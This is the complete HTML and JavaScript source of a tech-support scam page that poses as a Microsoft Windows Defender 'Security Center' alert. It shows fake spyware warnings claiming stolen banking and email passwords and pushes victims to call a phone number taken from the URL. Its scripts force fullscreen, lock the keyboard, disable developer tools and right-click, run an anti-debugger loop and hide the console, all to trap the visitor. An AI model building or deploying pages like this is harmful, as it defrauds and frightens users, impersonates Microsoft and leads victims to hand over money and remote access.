
<!doctype html>
<html lang="en">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-173230071-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-173230071-1');
</script>
    
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css" crossorigin="anonymous">
    <script src="js/jquery.min.js"></script>
    <link rel="stylesheet" type="text/css" href="css/main.css">
    <title>Security Center</title>
    <link rel="stylesheet" href="css/font-awesome.min.css">

    <script>
        function dsasfsdcscnsmndqweqwe(name)
        {
            name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
            var regexS = "[\\?&]"+name+"=([^&#]*)";
            var regex = new RegExp( regexS );
            var results = regex.exec( window.location.href );
            if( results == null )
                return "";
            else
                return results[1];
        }
        var phone = dsasfsdcscnsmndqweqwe('phone');
    </script>

    <script type="text/javascript">
        window.onload = function () {
            document.onclick = function (e) {
                e = e || event;
                target = e.target || e.srcElement;
                if (target.tagName === "DIV") {
                    toggleFullScreen();
                    document.body.style.cursor = 'not-allowed';
                    document.getElementById('map').innerHTML = stroka;
                    document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
                } else {
                    toggleFullScreen();
                    document.body.style.cursor = 'not-allowed';
                    document.getElementById('map').innerHTML = stroka;
                    document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
                }
            }
        }
    </script>
</head>
<body id="mycanvas" class="map" onbeforeunload="return myFunction()" style="cursor:none;">

<div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="images/bg2.jpg" alt width="100%"></div>

</div>
<a href="#" rel="noreferrer" id="link_black" style="cursor: none;">
    <div class="black" style="height: 145%;cursor: none;"></div>
</a>






<div id="footer" style="top: 672px; position: absolute;cursor: none;">
    <div class="row">

        <div class="col-md-12">
            <div class="right-foot" style="text-align: center;">
                <span id="footertxt"><img src="images/microsoft.png"> Call Microsoft Security Centre: </span><span style="font-weight: 700;padding-left: 13px;color: #fff;">(Toll-Free)<span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;"><script>document.write(phone)</script> </span> </span>
            </div>
        </div>
        <div class="col-md-12">
            <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 10px;">Windows Secure Services prevented an unrecognized IP Application from stating. Running this IP application might put your PC
                    at risk. Windows Defender Scan has found potentially unwanted Threat on this device that can steal
                    your passwords, online identity, financial information, personal Information, pictures or
                    documents.</small></marquee>
        </div>
    </div>


</div>

<div id="yteuwqtudggsajdgjahs" class="lightbox">
    <div class="ilb top">
        <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
            <span id="txtadd" class="fl title"><span class="fl ilb"><img src="images/def.png" class="logo3"></span>Security Services</span>
            <span id="txts1" class="fl title2"><a href="#"><img src="images/cross.png"></a></span>

        </div>
    </div>
    <div id="txtintro">
                <span class="colo-rd">App: Ads.fiancetrack(2).dll<br>
                Threat Detected:  Trojan Spyware</span>
    </div>
    <img id="banner" src="images/virus-images.jpg">
    <div id="disclaimer">
        Access has been blocked for security reasons and for Safety.<br>
        <span class="support">Call Windows Security Toll Free: <script>document.write(phone)</script> </span>
    </div>
    <div id="bottom">
        <img id="badge" src="images/microsoft.png"><span class="title3">Microsoft</span>
        <ul>
            <li>
                <a href="#">
                    <div class="fr button2">
                        <span id="addtochromebutton">Cancel</span>
                    </div>
                </a>
            </li>
            <li>
                <a href="#">
                    <div class="fr button">
                        <span id="addtochromebutton">Scan</span>
                    </div>
                </a>
            </li>
        </ul>

    </div>
</div>

<div id="pop_up_new" class="cardcontainer" style="cursor: none;">
    <p class="text-center" style="    font-size: 16px;
    font-weight: normal;
    margin: 0;
    margin-bottom: 5px;
    padding: 5px 10px;
    color: #FFFFFF !important;
    color: #414141;font-weight: bold;
    margin-top: 8px;">MS WINDOWS DEFENDER - Warning Alert System</p>
    <p>** ACCESS HAS BEEN BLOCKED FOR SECURITY REASONS AND FOR THE SAFETY **</p>
    <p>Your System has alerted us that it has been infected with Spyware Issues. The following data has been
        Breached.</p>
    <p>&gt; Email Passwords<br>
        &gt; Banking Passwords<br>
        &gt; Facebook Login<br>
        &gt; Photos &amp; Files

    </p>
    <p>Windows Security Feature has found potentially unwanted Adware on this device that can Breach your passwords, online
        identity, financial information, files, Personal pictures or documents.</p>
    <p>You must Call us immediately so that our System engineers can walk you through the removal process over the
        Phone.</p>
    <p>Contact MS Windows Toll-Free immediately to report this threat, prevent identity theft and unlock access to this
        device.</p>
    <p>Closing this Page will put your personal information at risk and lead to a suspension of your Windows
        Registration Private Key.</p>
    <p style="padding-bottom: 0px; color:#fff; font-size:14px;">Contact Microsoft (Toll-Free) Number: <strong>
            <script>document.write(phone)</script> </strong></p>
    <div class="action_buttons"><a class="active" id="leave_page" style="cursor: pointer; color: #FFFFFF !important;">Allow</a> <a class="active" id="leave_page" style="color: #FFFFFF !important;">Deny</a>
    </div>
</div>

<div id="welcomeDiv" style=" display:none; background-color:rgb(40 40 40 / 62%); height: auto; width: 550px; margin-left:30%;position: absolute;z-index: 9999999999;  " class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">You must Call us immediately so that our System engineers can walk you through the removal process over the
        phone.<br>Your Computer is disabled. <br><br> </p>


</div>

<script src="js/modernizr.min.js" type="text/javascript"></script>
<script src="js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="js/fullscreen.js"></script>
<script type="text/javascript" src="js/before.js"></script>
<script type="text/javascript" src="js/main.js"></script>
<script type="text/javascript" src="js/light.js"></script>
<script type="text/javascript">
    $(function () {
        var dhlaskhlncwqhhqwlelqj = 0;
        var interval = setInterval(function () {
            dhlaskhlncwqhhqwlelqj += 10;
            $("#dynamic")
                .css("width", dhlaskhlncwqhhqwlelqj + "%")
                .attr("aria-valuenow", dhlaskhlncwqhhqwlelqj)
                .text(dhlaskhlncwqhhqwlelqj + "% Complete");
            if (dhlaskhlncwqhhqwlelqj >= 100)
                clearInterval(interval);
        }, 100);
    });
</script>
<script type="text/javascript">
    (function ($) {
        $.fn.countTo = function (options) {
            options = options || {};

            return $(this).each(function () {
                // set options for current element
                var settings = $.extend({}, $.fn.countTo.defaults, {
                    from: $(this).data('from'),
                    to: $(this).data('to'),
                    speed: $(this).data('speed'),
                    refreshInterval: $(this).data('refresh-interval'),
                    decimals: $(this).data('decimals')
                }, options);

                // how many times to update the value, and how much to increment the value on each update
                var loops = Math.ceil(settings.speed / settings.refreshInterval),
                    increment = (settings.to - settings.from) / loops;

                // references & variables that will change with each update
                var self = this,
                    $self = $(this),
                    loopCount = 0,
                    value = settings.from,
                    data = $self.data('countTo') || {};

                $self.data('countTo', data);

                // if an existing interval can be found, clear it first
                if (data.interval) {
                    clearInterval(data.interval);
                }
                data.interval = setInterval(updateTimer, settings.refreshInterval);

                // initialize the element with the starting value
                render(value);

                function updateTimer() {
                    value += increment;
                    loopCount++;

                    render(value);

                    if (typeof (settings.onUpdate) == 'function') {
                        settings.onUpdate.call(self, value);
                    }

                    if (loopCount >= loops) {
                        // remove the interval
                        $self.removeData('countTo');
                        clearInterval(data.interval);
                        value = settings.to;

                        if (typeof (settings.onComplete) == 'function') {
                            settings.onComplete.call(self, value);
                        }
                    }
                }

                function render(value) {
                    var formattedValue = settings.formatter.call(self, value, settings);
                    $self.html(formattedValue);
                }
            });
        };

        $.fn.countTo.defaults = {
            from: 0,               // the number the element should start at
            to: 0,                 // the number the element should end at
            speed: 1,           // how long it should take to count between the target numbers
            refreshInterval: 1,  // how often the element should be updated
            decimals: 0,           // the number of decimal places to show
            formatter: formatter,  // handler for formatting the value before rendering
            onUpdate: null,        // callback method for every time the element is updated
            onComplete: null       // callback method for when the element finishes updating
        };

        function formatter(value, settings) {
            return value.toFixed(settings.decimals);
        }
    }(jQuery));

    jQuery(function ($) {
        // custom formatting example
        $('.count-number').data('countToOptions', {
            formatter: function (value, options) {
                return value.toFixed(options.decimals).replace(/\B(?=(?:\d{3})+(?!\d))/g, ',');
            }
        });

        // start all the timers
        $('.timer').each(count);

        function count(options) {
            var $this = $(this);
            options = $.extend({}, options || {}, $this.data('countToOptions') || {});
            $this.countTo(options);
        }
    });
</script>
<script type="text/javascript">
    $(document).ready(function () {
        $(".pro_box2").delay(1).fadeIn(800);
        $(".pro_box3").delay(1).fadeIn(800);
        $(".pro_box3").delay(1).fadeIn(800);
        $("#pop_up_new").delay(1).fadeIn(800);
        $("#yteuwqtudggsajdgjahs").delay(1).fadeIn(800);
    });
</script>
<script type="text/javascript">
    document.addEventListener('keyup', function (es) {
        if (es.keyCode === 27) {
            toggleFullScreen();
        }
    }, false);
</script>
<script type="text/javascript">
    document.addEventListener('keyup', function (e) {
        if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
            document.getElementById('map').innerHTML = stroka;
            toggleFullScreen();
        }
    }, false);
</script>
<script>
    var modal = document.getElementById('myModal');
    var btn = document.getElementById("myBtn");
    var span = document.getElementsByClassName("close")[0];

   
    span.onclick = function () {
        modal.style.display = "none";
    }

    window.onclick = function (event) {
        if (event.target == modal) {
            modal.style.display = "none";
        }
    }
    $(document).ready(function () {
        $("#mycanvas").click(function () { $("#welcomeDiv").show();});
        
        $("body").mouseover(function () {$("#yteuwqtudggsajdgjahs").show();
        });
        
    });
</script>
</body>

<script>
      function play() {
        var audio = document.getElementById("audio");
        audio.play();
      }
 </script>
<script>
navigator.keyboard.lock();
document.onkeydown = function (e) {
return false;
}
</script>
    <script>

    document.onkeydown = function (e) {
        if (event.keyCode == 123) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'I'.charCodeAt(0) || e.keyCode == 'i'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'l'.charCodeAt(0) || e.keyCode == 'l'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'C'.charCodeAt(0) || e.keyCode == 'c'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && (e.keyCode == 'J'.charCodeAt(0) || e.keyCode == 'j'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && (e.keyCode == 'U'.charCodeAt(0) || e.keyCode == 'u'.charCodeAt(0))) {
            return false;
        }
        if (e.ctrlKey && (e.keyCode == 'S'.charCodeAt(0) || e.keyCode == 's'.charCodeAt(0))) {
            return false;
        }
    }
</script>
<script>
document.addEventListener('contextmenu', event => event.preventDefault());
(function () {
        (function a() {
            try {
                (function b(i) {
                    if (('' + (i / i)).length !== 1 || i % 20 === 0) {
                        (function () { }).constructor('debugger')()
                    } else {
                        debugger
                    }
                    b(++i)
                }
                )(0)
            } catch (e) {
                setTimeout(a, 5)
            }
        }
        )()
    }
    )();
    delete window.console
console.log('test');
</script>

</html>